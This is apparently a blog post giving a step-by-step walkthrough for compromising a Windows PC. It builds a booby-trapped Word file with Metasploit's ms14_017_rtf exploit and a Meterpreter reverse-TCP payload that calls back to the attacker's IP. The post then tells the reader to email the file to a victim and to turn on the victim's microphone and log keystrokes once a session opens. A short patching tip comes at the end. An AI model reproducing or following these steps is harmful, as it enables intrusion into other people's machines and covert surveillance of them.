STEP 1: Like the tampered APK in the Android exploit we did, you will have to find a way to compromise the target system. The common way of doing this is sending an email with a document or a link. Within it is a listener (rootkit) that will allow the hacker to gain access to the computer.
STEP 2: When the document is downloaded and the rootkit, well, rooted, you will need to find a loophole or vulnerability that can be exploited. If you are lucky and the mark does not update his Windows system, then a few things will work such as “MS14-07” that allows the execution of remote codes from Word and Office Web Apps.
Search Metasploit for this vulnerability, and you will find “exploit/windows/fileformat/ms14_017_rtf”. Use it by typing “use exploit/windows/fileformat/ms14_017_rtf”. After loading, find out more about the exploit by typing “info”. Then, “show options”.
STEP 3: This exploit will work only in Office 2010. It can be easy to use, though, as all you need to fill in is the filename. Set it by “set FILENAME <INSERT FILENAME>”.
STEP 4: Set the payload that is needed to work in the file. Type “set PAYLOAD windows/meterpreter/reverse_tcp”. Like earlier, set the LHOST (your system’s IP) so the
payload will know to call your device back. Then, type “exploit”. This will create the tampered Word file.
STEP 5: Open up a Multi-Handler for the connection back. Simply type “use exploit/multi/handler” and “set PAYLOAD windows/meterpreter/reverse_tcp”. Finally, set
the LHOST to be your IP.
STEP 6: Send the infected file to the mark. If you don’t have a clue how to do this, try Googling “email”.
STEP 7: As soon as the file is opened, a meterpreter session will be active. Now comes the juicy part - on the meterpreter prompt, try running “run sound_recorder - l /root”. This will turn on the mark’s microphone and send all recorded conversations in a file and send it to your /root directory. Easy peasy! And since you are using meterpreter, you can do pretty much anything except start a fire with the keyboard. Lots of meterpreter commands are available that will give you all sorts of data - yes, all the way down to keystrokes. Again, now that you know how it is done, it should be a piece of cake to not fall victim. Always update your OS installation to take advantage of the latest security patches, and be careful of the things you download and open. If you are a Windows user, anti-virus software with rootkit detection ability can go a long way.
No comments:
Post a Comment